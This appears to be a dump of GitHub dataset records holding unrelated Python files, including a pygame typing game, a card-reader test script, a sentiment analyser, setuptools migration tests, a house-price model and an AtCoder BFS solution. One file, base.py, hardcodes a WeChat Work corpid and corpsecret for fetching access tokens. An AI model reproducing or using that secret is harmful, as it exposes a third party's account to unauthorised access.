ValueError:\n    raise Exception(invalid_runtime_argument)\n\nresult = update_movie_runtime(int(movieId), int(runtime))\nif not result:\n    raise Exception(invalid_movieID_argument)\nprint(\n    f\"Movie with ID {movieId} has been updated to a runtime of {runtime}\")\n","repo_name":"cpon00/full-db-sdk-cinquel","sub_path":"python/update_movie_runtime.py","file_name":"update_movie_runtime.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40238301189","text":"import pygame\nfrom pygame.locals import *\n\nclass User:\n    def __init__(self, font):\n        self.font = font\n        self.fontWidth = self.font.size('M')[0]\n        self.fontHeight = self.font.size('Tg')[1]\n        self.text = self.difficulty = ''\n        \n    def display(self, screen, rect, color, aa = True):\n        pygame.draw.rect(screen, color, rect, 2)\n\n        \n        text = self.text\n\n        if self.difficulty == 'word-by-word':\n            if ' ' in text[:-1]:\n                text = text[text.rindex(' '):].strip()\n            else:\n                text = text.strip()\n\n        rect = pygame.Rect(rect)\n\n        while self.font.size(text)[0] > rect.width:\n            i = 1\n            while self.font.size(text[:i])[0] < rect.width and i < len(text):\n                i += 1\n            text = text[i:]\n\n        image = self.font.render(text, aa, color)\n        screen.blit(image, (rect.left + 10, rect.y))\n\n    def input(self, event):\n        ctrl, backspace = pygame.key.get_pressed()[K_LCTRL], pygame.key.get_pressed()[K_BACKSPACE]\n        space = pygame.key.get_pressed()[K_SPACE]\n\n        if ctrl and backspace:\n            try:\n                self.text = self.text[:self.text.rindex(\" \")]\n            except ValueError:\n                self.text = ''\n\n        elif backspace:\n            if self.difficulty == 'word-by-word':\n                if self.text[-1] != ' ':\n                    self.text = self.text[:-1]\n            else:\n                self.text = self.text[:-1]\n\n        else:\n            self.text += event.unicode\n        \n    def empty(self):\n        self.text = ''\n    \n    def length(self):\n        return len(self.text)\n    \n    def _show(self, text):\n        self.text = text\n    \n    def set_difficulty(self, difficulty):\n        self.difficulty = difficulty\n    \n    def cur_word(self):\n        try:\n            return self.text.count(' ')\n        except:\n            return 
0","repo_name":"JoshuaHM-p4/speed-type-pygame","sub_path":"gamelib/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2309858066","text":"#17413 단어 뒤집기 2\n#문자열, 정규표현식\n\nimport re\n\nr = re.compile('<[a-z ]+>|[a-z0-9 ]+')\nregs = r.findall(input())\n\n\nans = ''\nfor x in regs:\n if x[0] == '<':\n ans += x\n else:\n temp = x.split(' ')\n rev = []\n for y in temp:\n y = y[::-1]\n rev.append(y)\n rev = \" \".join(rev)\n ans += rev\n\nprint(ans)","repo_name":"llordly/ploblem-solving","sub_path":"17413.py","file_name":"17413.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72823252200","text":"import argparse\nimport signal\nimport time\n\nfrom devices.vendors.teracom.act230.act230 import ACT230\nfrom devices.factories.card_readers.card_reader_state import CardReaderState\n\n#region File Attributes\n\n__author__ = \"Orlin Dimitrov\"\n\"\"\"Author of the file.\"\"\"\n\n__copyright__ = \"Copyright 2020, POLYGON Team Ltd.\"\n\"\"\"Copyrighter\n@see http://polygonteam.com/\"\"\"\n\n__credits__ = [\"Angel Boyarov\"]\n\"\"\"Credits\"\"\"\n\n__license__ = \"GPLv3\"\n\"\"\"License\n@see http://www.gnu.org/licenses/\"\"\"\n\n__version__ = \"1.0.0\"\n\"\"\"Version of the file.\"\"\"\n\n__maintainer__ = \"Orlin Dimitrov\"\n\"\"\"Name of the maintainer.\"\"\"\n\n__email__ = \"or.dimitrov@polygonteam.com\"\n\"\"\"E-mail of the author.\n@see or.dimitrov@polygonteam.com\"\"\"\n\n__status__ = \"Debug\"\n\"\"\"File status.\"\"\"\n\n#endregion\n\n__reader = None\n__time_to_stop = False\n\ndef reader_read(card_id, reader_id):\n\n print(\"Card ID: {}; Reader ID: {}\".format(card_id, reader_id))\n\ndef shutdown():\n global __reader, __time_to_stop\n\n __time_to_stop = True\n\n print(\"Stopping\")\n\n if __reader is not None:\n __reader.shutdown()\n\n while __reader.reader_state == CardReaderState.RUN:\n pass\n\n del __reader\n\n print(\"Stopped\")\n\ndef init(port_name, sn):\n global __reader, __time_to_stop\n\n __time_to_stop = False\n\n print(\"Starting\")\n\n # Create card reader.\n __reader = ACT230(port_name=port_name,\n baudrate=9600,\n serial_number=sn)\n\n if __reader.reader_state is CardReaderState.NONE:\n __reader.cb_read_card(reader_read)\n __reader.init()\n\n print(\"Started\")\n\ndef update():\n global __reader, __time_to_stop\n\n # Check the exit card reader.\n if __reader is not None:\n\n # Update card reader.\n __reader.update()\n\n if __reader.reader_state == CardReaderState.STOP:\n\n message = \"Card reader {}; State {}; Port {}.\"\\\n .format(__reader.serial_number, \\\n __reader.reader_state, \\\n __reader.port_name)\n\n print(message)\n\n __reader.init()\n\n if __reader.reader_state == CardReaderState.NONE:\n\n message = \"Card reader {}; State {}.\"\\\n .format(__reader.serial_number, __reader.reader_state)\n\n print(message)\n\n __reader.init()\n\ndef interupt_handler(signum, frame):\n \"\"\"Interupt handler.\"\"\"\n\n global __time_to_stop\n\n __time_to_stop = True\n\n if signum == 2:\n print(\"Stopped by interupt.\")\n\n elif signum == 15:\n print(\"Stopped by termination.\")\n\n else:\n print(\"Signal handler called. 
Signal: {}; Frame: {}\".format(signum, frame))\n\n shutdown()\n\ndef main():\n global __time_to_stop\n\n\n # Add signal handler.\n signal.signal(signal.SIGINT, interupt_handler)\n signal.signal(signal.SIGTERM, interupt_handler)\n\n # Create parser.\n parser = argparse.ArgumentParser()\n\n # Add arguments.\n parser.add_argument(\"--port\", type=str, default=\"COM5\", help=\"Serial port\")\n parser.add_argument(\"--sn\", type=str, default=\"2911\", help=\"Host of the robot.\")\n\n # Take arguments.\n args = parser.parse_args()\n\n init(args.port, args.sn)\n\n while not __time_to_stop:\n update()\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bgerp/ztm","sub_path":"Zontromat/devices/vendors/teracom/act230/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41296858826","text":"import os\nimport pickle \nimport json\nfrom tqdm import tqdm\n\ndef cvt_pkl2xz(predict_relations,save_dir):\n \n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n results = predict_relations\n\n count = 0\n for video_name, res in tqdm(results.items()):\n # print(video_name)\n # print(res[0].keys())\n\n res_ = []\n for r in res:\n sub_traj = r[\"sub_traj\"]\n # sub_traj = [[round(int(x)) for x in xx] for xx in sub_traj]\n\n obj_traj = r[\"obj_traj\"]\n # obj_traj = [[round(int(x)) for x in xx] for xx in obj_traj]\n\n res_.append(\n {\n \"triplet\":r[\"triplet\"],\n \"duration\":r[\"duration\"],\n \"score\":r[\"score\"],\n \"sub_traj\":sub_traj,\n \"obj_traj\":obj_traj\n }\n )\n\n result_per_video = {video_name:res_}\n save_path = os.path.join(save_dir,video_name)\n with open(save_path,'w') as f:\n json.dump(result_per_video,f)\n\n os.system(\"xz -z {}\".format(save_path)) # xz compression\n count += 1\n # if count > 4:\n # break\n\n\n\n\n ## --------- zip compression -------\n print(\"finish cvt-result, start zip compression...\")\n os.system(\"zip -r {}.zip {}\".format(save_dir,save_dir))\n\n abs_path = os.path.abspath(\"{}.zip\".format(save_dir))\n print(\"all finished, result saved at {}\".format(abs_path))\n os.system(\"du -sh {}\".format(abs_path))\n","repo_name":"Dawn-LX/VidSGG-BIG","sub_path":"utils/cvt_result.py","file_name":"cvt_result.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"18"} +{"seq_id":"1813926620","text":"# -*- coding: utf-8 -*-\n\nimport codecs\nimport re\n\nimport sys\n\nfrom lxml import etree\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom setting import *\n\n\nsys.path.append('E:\\Python\\workspace\\TDTSystem')\nfrom ltp.ltp import Ltp\n\n\n# 文本情感分析类\nclass EmotionAnalysis:\n\n def __init__(self, ltp):\n \"\"\"\n init class\n :param ltp: Ltp类实例\n \"\"\"\n self.ltp = ltp\n self.postive_list = []\n self.negative_list = []\n self.deny_list = []\n self.degree_list = []\n\n if POSTIVE_DICT_PATH: # 载入正向情感词典\n self.postive_list = self.open_dict(POSTIVE_DICT_PATH)\n if NEGATIVE_DICT_PATH: # 载入负向情感词典\n self.negative_list = self.open_dict(NEGATIVE_DICT_PATH)\n if DENY_DICT_PATH: # 载入否定词典\n self.deny_list = self.open_dict(DENY_DICT_PATH)\n if DEGREE_DICT_PATH: # 载入程度副词词典\n self.degree_list = self.open_dict(DEGREE_DICT_PATH)\n\n def open_dict(self, file_path):\n \"\"\"\n 载入词典\n :param file_path: str, 词典路径\n :return: list, 词列表\n \"\"\"\n dict = []\n with open(file_path, encoding='utf-8') as f:\n for line in f.readlines():\n line 
= line.strip()\n if line:\n dict.append(line)\n return dict\n\n def judgeodd(self, num):\n \"\"\"\n 判断整数奇偶性\n :param num: int\n :return:\n \"\"\"\n if (num % 2) == 0:\n return False\n else:\n return True\n\n def get_degree_score(self, word):\n \"\"\"\n 获取程度副词的权重\n :param word: str\n :return: float\n \"\"\"\n try:\n index = self.degree_list.index(word)\n print('d:', word)\n for i in range(len(DEGREE_SCORE[0])):\n if index < DEGREE_SCORE[0][i]:\n return DEGREE_SCORE[1][i]\n return DEGREE_SCORE[1][i + 1]\n except:\n return 1.0\n\n def contain_word(self, sentence, word):\n \"\"\"\n 判断句子是否包含某单词\n :param sentence: list,\n :param word: str\n :return:\n \"\"\"\n for words in sentence:\n if word in words:\n return True\n return False\n\n def word_arcs_analyse(self, i, arcs, roles=None):\n \"\"\"\n 根据情感词语在句子中的依存句法关系,修正情感分值\n :param i: int, 情感词在句子中的索引\n :param arcs: Ltp依存句法关系分析输出\n :param roles: Ltp语义角色标注输出\n :return: float\n \"\"\"\n if roles:\n for role in roles:\n if i == role.index:\n return 3.0\n label = arcs[i][1]\n if re.search('COO', label):\n label = arcs[arcs[i][0] - 1][1]\n print(label)\n if re.search('SBV|POB', label):\n return 0.0\n elif re.search('ATT|ADV', label):\n return 0.5\n elif re.search('VOB', label):\n return 2.0\n elif re.search('HED', label):\n return 3.0\n else:\n return 1.0\n\n def sentiment_score(self, parser):\n \"\"\"\n 句子情感分析算法\n :param parser: list, Ltp.sentence_parser输出\n :return: list, [正面情感分值, 负面情感分值]\n \"\"\"\n words = parser[0] # 分词结果\n arcs = parser[3] # 依存句法分析结果\n roles = parser[4] # 语义角色标注结果\n i = 0\n a = 0\n postive_score = 0.0\n negative_score = 0.0\n for i in range(len(words)):\n word = words[i].strip()\n if not word:\n continue\n temp_score = 0.0\n if word in self.postive_list: # 扫描正面情感词\n print('+', word)\n temp_score = self.word_arcs_analyse(i, arcs, roles)\n c = 0\n for w in words[a:i]: # 扫描程度副词\n temp_score *= self.get_degree_score(w)\n if w in self.deny_list: # 扫描否定词\n print('n: ', w)\n c += 1\n if self.judgeodd(c):\n postive_score += (temp_score * -1.0)\n else:\n postive_score += temp_score\n a = i + 1\n\n elif word in self.negative_list: # 扫面负面情感词\n print('-', word)\n temp_score = self.word_arcs_analyse(i, arcs, roles)\n c = 0\n for w in words[a:i]:\n temp_score *= self.get_degree_score(w)\n if w in self.deny_list:\n print('n: ', w)\n c += 1\n if self.judgeodd(c):\n negative_score += (temp_score * -1.0)\n else:\n negative_score += temp_score\n a = i + 1\n\n # elif word == '!' 
or word == '!':\n # print(words)\n # for w2 in words[::-1]:\n # if w2 in self.postive_list or self.negative_list:\n # postive_score *= 2.0\n # negative_score *= 2.0\n # break\n # i += 1 # 扫描词位置前移\n\n if postive_score < 0:\n negative_score -= postive_score\n postive_score = 0\n if negative_score < 0:\n postive_score -= negative_score\n negative_score = 0\n\n return [postive_score, negative_score]\n\n def sent_sentiment_score(self, text):\n \"\"\"\n 文档情感分析,文档分句,每句进行情感分析,后加权平均\n :param text:\n :return:\n \"\"\"\n sents = [sentence for sentence in re.split(r'[,,]', text) if sentence]\n score = [0.0, 0.0]\n for sent in sents:\n parser = self.ltp.sentence_parser(sent)\n score_temp = self.sentiment_score(parser)\n # print(score_temp)\n score[0] += score_temp[0]\n score[1] += score_temp[1]\n # for review in senti_score_list:\n # score_array = np.array(review)\n # Pos = np.sum(score_array[:, 0])\n # Neg = np.sum(score_array[:, 1])\n # AvgPos = np.mean(score_array[:, 0])\n # AvgPos = float('%.1f'%AvgPos)\n # AvgNeg = np.mean(score_array[:, 1])\n # AvgNeg = float('%.1f'%AvgNeg)\n # StdPos = np.std(score_array[:, 0])\n # StdPos = float('%.1f'%StdPos)\n # StdNeg = np.std(score_array[:, 1])\n # StdNeg = float('%.1f'%StdNeg)\n # score.append([Pos, Neg, AvgPos, AvgNeg, StdPos, StdNeg])\n return score\n\n\ndef xml_analysis(xml_path):\n tree = etree.parse(xml_path)\n root = tree.getroot()\n fr1 = codecs.open('train_data.txt', 'a', 'utf-8')\n fr2 = codecs.open('train_label.txt', 'a', 'utf-8')\n for child in root:\n for sentence in child.xpath('.//sentence'):\n text = str(sentence.xpath('.//text()')[0]).strip()\n label = sentence.attrib.get('polarity')\n if label:\n if label == 'POS':\n label = '1'\n elif label == 'NEG':\n label = '-1'\n else:\n label = '0'\n\n if text:\n fr1.write(text + '\\n')\n fr2.write(label + '\\n')\n text = None\n label = None\n fr1.close()\n fr2.close()\n\n\nif __name__ == '__main__':\n ltp = Ltp(4)\n ltp.load_dict(ALL_DICT_PATH)\n analyzer = EmotionAnalysis(ltp)\n\n sent = '苹果说,用户从即日起可以预定新款iPad,有关产品将于3月16日开始率先在美国、澳大利亚、加拿大、法国、中国香港和新加坡等10多个国家和地区率先上市。'\n\n print(analyzer.sent_sentiment_score(sent.strip()))\n","repo_name":"695573425/TDTSystem","sub_path":"emotion/emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":8092,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"1173867852","text":"from collections import defaultdict\nfrom typing import Iterable, List, Optional\n\nfrom rex.data.label_encoder import LabelEncoder\nfrom rex.data.transforms.base import TransformBase\nfrom rex.data.vocab import Vocab\nfrom rex.utils.logging import logger\nfrom rex.utils.mask import construct_piecewise_mask\nfrom rex.utils.position import construct_relative_positions, find_all_positions\nfrom rex.utils.progress_bar import pbar\n\n\nclass CachedMCMLSentRETransform(TransformBase):\n \"\"\"\n Data transform for cached multi-class multi-label sentence-level relation extraction task.\n \"\"\"\n\n def __init__(self, max_seq_len, rel2id_filepath, emb_filepath) -> None:\n super().__init__()\n\n self.max_seq_len = max_seq_len\n self.vocab = Vocab.from_pretrained(\n emb_filepath,\n include_weights=True,\n init_pad_unk_emb=False,\n include_pad=False,\n include_unk=False,\n )\n self.label_encoder = LabelEncoder.from_pretrained(rel2id_filepath)\n\n def transform(\n self,\n data: Iterable,\n desc: Optional[str] = \"Transform\",\n debug: Optional[bool] = False,\n ) -> List[dict]:\n num_truncated_rels = 0\n final_data = []\n if debug:\n 
data = data[:5]\n transform_loader = pbar(data, desc=desc)\n\n for d in transform_loader:\n ent_validation = []\n for ent in d[\"entities\"]:\n if ent[2] > self.max_seq_len:\n ent_validation.append(False)\n continue\n ent_validation.append(True)\n valid_ent_pair2rels = defaultdict(set)\n for rel in d[\"relations\"]:\n if ent_validation[rel[1]] is False or ent_validation[rel[2]] is False:\n num_truncated_rels += 1\n continue\n valid_ent_pair2rels[(rel[1], rel[2])].add(\n self.label_encoder.encode_one(rel[0])\n )\n if len(valid_ent_pair2rels) == 0:\n continue\n token_ids, _ = self.vocab.encode(\n d[\"tokens\"], self.max_seq_len, update=False\n )\n for ent_pair, rels in valid_ent_pair2rels.items():\n head_pos = construct_relative_positions(\n d[\"entities\"][ent_pair[0]][1], self.max_seq_len\n )\n tail_pos = construct_relative_positions(\n d[\"entities\"][ent_pair[1]][1], self.max_seq_len\n )\n final_data.append(\n {\n \"id\": d[\"id\"],\n \"token_ids\": token_ids,\n \"mask\": construct_piecewise_mask(\n d[\"entities\"][ent_pair[0]][1],\n d[\"entities\"][ent_pair[1]][1],\n min(len(d[\"tokens\"]), self.max_seq_len),\n self.max_seq_len,\n ),\n \"labels\": rels,\n \"head_pos\": head_pos,\n \"tail_pos\": tail_pos,\n }\n )\n final_data = list(filter(lambda x: x is not None, final_data))\n for d in final_data:\n d[\"labels\"] = self.label_encoder.convert_to_multi_hot(d[\"labels\"])\n logger.info(transform_loader)\n logger.warning(f\"#truncated_rels: {num_truncated_rels}\")\n return final_data\n\n def predict_transform(self, obj: dict):\n \"\"\"Transform for prediction\n\n Args:\n obj: dict object with ``text`` (str), ``head`` (str) and ``tail`` (str) fields\n \"\"\"\n if obj[\"head\"] not in obj[\"text\"] or obj[\"tail\"] not in obj[\"text\"]:\n raise ValueError(f\"{obj['head']} or {obj['tail']} is not in {obj['text']}\")\n head_pos = find_all_positions(obj[\"text\"], obj[\"head\"])[0]\n tail_pos = find_all_positions(obj[\"text\"], obj[\"tail\"])[0]\n if head_pos[1] > self.max_seq_len:\n logger.warning(\"head entity truncated\")\n head_pos = [self.max_seq_len - 1, self.max_seq_len]\n if tail_pos[1] > self.max_seq_len:\n logger.warning(\"tail entity truncated\")\n tail_pos = [self.max_seq_len - 1, self.max_seq_len]\n token_ids, _ = self.vocab.encode(\n list(obj[\"text\"]), self.max_seq_len, update=False\n )\n d = {\n \"id\": \"\",\n \"token_ids\": token_ids,\n \"mask\": construct_piecewise_mask(\n head_pos[0],\n tail_pos[0],\n min(len(obj[\"text\"]), self.max_seq_len),\n self.max_seq_len,\n ),\n \"labels\": None,\n \"head_pos\": construct_relative_positions(head_pos[0], self.max_seq_len),\n \"tail_pos\": construct_relative_positions(tail_pos[0], self.max_seq_len),\n }\n return d\n","repo_name":"Spico197/REx","sub_path":"rex/data/transforms/sent_re.py","file_name":"sent_re.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"33536426721","text":"\"\"\"\nTests of the \"simple cases\", where the data in setup.cfg or setup.py is read\nin by setuptools, stored as-is, and added directly or with minor transformations\ninto the pyproject data structure, rather than being parsed and used to\nconfigure some kind of dynamic functionality.\n\"\"\"\n\nimport pytest\n\nfrom typing import List\n\n\ndef test_name_and_version(project) -> None:\n \"\"\"\n Test we can generate a basic project skeleton.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\"\"\"\n pyproject = {\n 
\"build-system\": {\n \"requires\": [\"setuptools\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\n# install_requires tests, we use made-up module names here.\n\n\ndef test_install_requires(project) -> None:\n \"\"\"\n Test the install_requires is passed through if given.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\ninstall_requires =\n dependency1\n dependency2>=1.23\n dependency3<4.56\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"setuptools\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n \"dependencies\": [\"dependency1\", \"dependency2>=1.23\", \"dependency3<4.56\"],\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\n# setup_requires tests: we have to use real dependencies that actually are\n# installed, otherwise the tests will fail.\n\n\ndef test_setup_requires(project) -> None:\n \"\"\"\n Test setup_requires is passed through with 'setuptools' dependency.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_setup_requires_setuptools(project) -> None:\n \"\"\"\n Test that we don't duplicate 'setuptools' in build requirements\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n setuptools\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_setup_requires_setuptools_version(project) -> None:\n \"\"\"\n Test we can handle a build system that requires a specific setuptools version.\n \"\"\"\n setup_cfg = \"\"\"\\\n[metadata]\nname = test-project\nversion = 0.0.1\n\n[options]\nsetup_requires =\n setuptools>=34.56\n sphinx\n pytest>=6\n pytest-black<99.88.77\n\"\"\"\n pyproject = {\n \"build-system\": {\n \"requires\": [\"pytest-black<99.88.77\", \"pytest>=6\", \"setuptools>=34.56\", \"sphinx\"],\n \"build-backend\": \"setuptools.build_meta\",\n },\n \"project\": {\n \"name\": \"test-project\",\n \"version\": \"0.0.1\",\n },\n }\n project.setup_cfg(setup_cfg)\n project.setup_py()\n result = project.generate()\n assert result == pyproject\n\n\ndef test_description(make_write_pyproject) -> None:\n description = \"Description of TestProject\"\n\n cmd = make_write_pyproject(description=description)\n result = cmd._generate()\n assert result[\"project\"][\"description\"] == description\n\n\ndef test_empty_description(make_write_pyproject) 
-> None:\n description = \"\"\n\n cmd = make_write_pyproject(description=description)\n result = cmd._generate()\n assert \"description\" not in result[\"project\"]\n\n\n@pytest.mark.parametrize(\n \"keywords\",\n [\n [\"hovercraft\", \"full\", \"of\", \"eels\"],\n [\"\"],\n [\"hovercraft\", \"full of\", \"eels\"],\n ],\n ids=[\"simple\", \"zero-length\", \"space\"],\n)\ndef test_keywords(make_write_pyproject, keywords: List[str]) -> None:\n cmd = make_write_pyproject(keywords=keywords)\n result = cmd._generate()\n assert result[\"project\"][\"keywords\"] == keywords\n\n\ndef test_no_keywords(make_write_pyproject) -> None:\n cmd = make_write_pyproject(keywords=[])\n result = cmd._generate()\n assert \"keywords\" not in result[\"project\"]\n\n\ndef test_keywords_not_given(make_write_pyproject) -> None:\n cmd = make_write_pyproject()\n result = cmd._generate()\n assert \"keywords\" not in result[\"project\"]\n","repo_name":"diazona/setuptools-pyproject-migration","sub_path":"tests/test_static_data.py","file_name":"test_static_data.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"29812651644","text":"import requests\nfrom requests import Session\n\n\nclass Base:\n def __init__(self):\n self.s = Session()\n self.corpid = 'wwf793a42682053e6e'\n self.corpsecret = 'qdXH8QRbJhkgXu3jlP0S531suzE6cZ8LTwOQkJ4d1F8'\n self.s.params[\"access_token\"] = self.get_token().get(\"access_token\")\n\n def get_token(self, corpid=None, corpsecret=None):\n if corpid is None:\n corpid = self.corpid\n if corpsecret is None:\n corpsecret = self.corpsecret\n params = {\"corpid\": corpid, \"corpsecret\": corpsecret}\n token_response = requests.get('https://qyapi.weixin.qq.com/cgi-bin/gettoken', params=params)\n return token_response.json()\n","repo_name":"PAssassiN/hogwarts_ck16","sub_path":"test_api_requests/requests_page/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"353864563","text":"def merge(left, right):\n res = []\n while left and right:\n if left[0] < right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n if not left:\n res += right\n else:\n res += left\n return res\nA = [int(x) for x in input().split()]\nB = [int(x) for x in input().split()]\nprint(*merge(A, B))\n","repo_name":"alekseik1/python_mipt_study","sub_path":"2sem/repeat_algs/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"9456539252","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\n\n######################################################################################\n\n#---------------------\n# ingest data\n# https://www.kaggle.com/dansbecker/melbourne-housing-snapshot/download\n#---------------------\nmelbourne_file_path = 'data/melb_data.csv'\nX_full = pd.read_csv(melbourne_file_path)\n\n# drop data with missing values\nX_reduced = X_full.dropna(axis=0)\n\nprint(\"X_full shape: {}\".format(X_full.shape))\nprint(\"X_reduced shape: {}\".format(X_reduced.shape))\n\n\n#-----------------------------\n# building learning model\n# 
https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestRegressor.html\n#-----------------------------\n# setting the prediction target (traditionally labeled 'y')\ny = X_reduced.Price\n\n# choosing the training features (traditionally labeled 'X')\nfeatures = ['Rooms', 'Bathroom', 'Landsize', 'Lattitude', 'Longtitude']\nX = X_reduced[features]\n\n# split training/validation data\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\nprint(\"train_X shape: {}\".format(train_X.shape), end='\\n\\n')\n\nmelbourne_model = RandomForestRegressor(random_state=1)\nmelbourne_model.fit(train_X, train_y)\n\n\n#-----------------------------\n# model validation (MAE)\n# https://scikit-learn.org/stable/modules/classes.html?highlight=metrics#module-sklearn.metrics\n#-----------------------------\nval_predictions = melbourne_model.predict(val_X)\nval_MAE = mean_absolute_error(val_y, val_predictions)\nprint(\"Mean Absolute Error in predicted home prices: {:.2f}\".format(val_MAE))\n","repo_name":"Neutrollized/learning-machine-learning","sub_path":"02_melbourne_model.py","file_name":"02_melbourne_model.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10899396152","text":"from aws_cdk import aws_ssm as ssm\nfrom constructs import Construct\n\n\nclass CdkDocument:\n def CreateChangeCalendar(self, scope: Construct):\n content = \"BEGIN:VCALENDAR\\r\\nPRODID:-//AWS//Change Calendar 1.0//EN\\r\\nVERSION:2.0\\r\\nX-CALENDAR-TYPE:DEFAULT_CLOSED\\r\\nX-WR-CALDESC:詳細\\r\\nBEGIN:VTODO\\r\\nDTSTAMP:20200320T004207Z\\r\\nUID:3b5af39a-d0b3-4049-a839-d7bb8af01f92\\r\\nSUMMARY:Add events to this calendar.\\r\\nEND:VTODO\\r\\nEND:VCALENDAR\\r\\n\"\n\n # Content only accepts json. 
Therefore pass it empty and overwrite it later.\n        doc: ssm.CfnDocument = ssm.CfnDocument(\n            scope,\n            \"ChangeCalendar\",\n            content={},\n            document_type=\"ChangeCalendar\",\n            document_format=\"TEXT\",\n            name=\"ChangeCalendar\",\n            update_method=\"NewVersion\",\n        )\n        doc.add_property_override(\"Content\", content)\n","repo_name":"lio0oil/cdk_sample","sub_path":"cdk_sample/cdk_document.py","file_name":"cdk_document.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"25581378409","text":"# https://atcoder.jp/contests/joi2011yo/tasks/joi2011yo_e\n\n# Wasting endless time because I misread the problem statement was such a shame! Read the problem carefully!\n\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\n\ndef read_ints():\n    return list(map(int, read().split()))\n\n\ndef read_a_int():\n    return int(read())\n\n\ndef read_matrix(H):\n    '''\n    H is number of rows\n    '''\n    return [list(map(int, read().split())) for _ in range(H)]\n\n\ndef read_map(H):\n    '''\n    H is number of rows\n    For reading a board given as strings\n    '''\n    return [read() for _ in range(H)]\n\n\ndef read_col(H, n_cols):\n    '''\n    H is number of rows\n    n_cols is number of cols\n\n    For when column A, column B, ... are given\n    '''\n    ret = [[] for _ in range(n_cols)]\n    for _ in range(H):\n        tmp = list(map(int, read().split()))\n        for col in range(n_cols):\n            ret[col].append(tmp[col])\n\n    return ret\n\n\nH, W, N = read_ints()\nMAP = read_map(H)\n\n# List storing the coordinates of S (0) and of each number\nn_yx = [0] * (N + 1)\nfor i, row in enumerate(MAP):\n    for j, m in enumerate(row):\n        if m == 'S':\n            n_yx[0] = (i, j)\n            continue\n\n        for k in range(1, N + 1):\n            if m == str(k):\n                n_yx[k] = (i, j)\n                break\n    # Prepare for the search\nmvx = (1, 0, -1, 0)\nmvy = (0, 1, 0, -1)\n\n\ndef bfs(s, g, n_s):\n    '''\n    Takes the coordinates of s and returns the shortest distance to reach the coordinates of g.\n    However, according to n_s, cells with a larger number cannot be moved through.\n    '''\n    sy, sx = s\n    gy, gx = g\n\n    visited = [[False] * W for _ in range(H)]\n    # Think carefully about what to stack in the queue\n    # Here, storing (x and y to search, distance moved so far) should be enough.\n    que = deque([(sy, sx, 0)])\n    visited[sy][sx] = True # cells added to the queue are guaranteed to be visited.\n    # Breadth-first search\n    while que:\n        y, x, cost = que.popleft()\n\n        if y == gy and x == 